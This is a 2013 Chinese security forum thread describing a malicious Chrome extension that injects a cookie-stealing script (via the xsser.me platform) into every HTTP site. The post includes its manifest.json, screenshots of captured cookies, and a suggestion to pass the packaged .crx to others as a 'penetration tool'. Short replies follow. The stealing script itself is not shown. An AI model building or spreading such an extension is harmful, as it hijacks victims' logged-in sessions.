首页
社区
课程
招聘
[分享]Chrome浏览器插件欺骗攻击
发表于: 2013-4-15 07:28 6247

[分享]Chrome浏览器插件欺骗攻击

2013-4-15 07:28
6247
以前挖了一堆XSS,一开始觉得挺好玩的,后来觉悟了,以后提交就提交那种特别带感的,不好意思,哥,不大清楚应该是什么类型,您帮忙看看吧。。。这个纯属自己无聊时候想出来的,也不知道能不能通过。。。

Chrome插件开发,通过恶意的Chrome插件执行达到劫持整个浏览器,凡是通过chrome浏览器登陆的网站自动发送COOKIE。
在开始之前先来点chrome插件开发上的基础,开发一个chrome插件需要几个文件。
主文件 manifest.json (类似配置文件) 这次使用的manifest是:

{
   "name": "ThE WorLd",    //名字
   "version": "1.0",      //版本
   "manifest_version": 2,     //这个必须有
   "icons":{"128":"smile.gif"},   //图标
   "content_scripts":[         //设定javascript与网站的通信
      {
        "matches":["http://*/*"],  //设定与插件js通信的域 http://*/* 指任意网站
        "js":["location.js"]  //恶意js脚本
      }
   ],
   "description": "TEST",   //备注一样的玩意
   "browser_action": {    //图标
     "default_icon": {                 
       "19": "icon.gif",        
       "38": "smile.gif"            
     },
     "default_title":"ThE WorLd",     
     "default_popup": "popup.html"    //弹出窗口  
   }
}
content_scripts 这个是重点选项,可以设定网站与javascript的通信,这里我们设定了任意网址,如果只是想盗取比如微博的cookie只要设定 类似http://t.qq.com/* 就行,后面我们用上xsser.me 的js脚本。为了达到更好的欺骗效果,我们还得美化下popup.html。
不过这里我就不弄了,我不会美化。。。简单写两。

<h2>WOOYUN</h2>
最后使用到的就是一下几个玩意:http://www.2cto.com/uploadfile/2013/0413/20130413125309394.jpg

然后通过chrome导入插件。
http://www.2cto.com/uploadfile/2013/0413/20130413125309556.jpg

最后我们用chrome登陆几个网站看看。http://www.2cto.com/uploadfile/2013/0413/20130413125309511.jpg

最后登入XSSER 截取cookie成功。
http://www.2cto.com/uploadfile/2013/0413/20130413125310626.jpg

最后我们**地用chrome生成插件。

http://www.2cto.com/uploadfile/2013/0413/20130413125311218.jpg

吧下面那个.crx**的给别人,说,哥们,哥发现了一渗透神器........然后 她GAME OVER

修复方案:

小心这类玩意就是了...........
哥 可以的话给加个精华行不。。。。。

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (4)
雪    币: 143
活跃值: (263)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
2
强帖  占个板凳先
2013-4-15 07:35
0
雪    币: 6003
活跃值: (3490)
能力值: ( LV6,RANK:96 )
在线值:
发帖
回帖
粉丝
3
图片看不到.
2013-4-15 08:57
0
雪    币: 3366
活跃值: (1338)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
4
刚睡醒——瞧瞧
2013-4-15 09:08
0
雪    币: 967
活跃值: (1138)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
5
你都能控制别人安装你的插件了,还有什么不能做的,其他不就是功能开发吗?
关键是 怎么控制对方安装你的东西,并且你还要实时监控别人卸载你的插件的一个东西出来,这个东西就是所谓的病毒
2013-4-15 09:36
0
游客
登录 | 注册 方可回帖
返回
//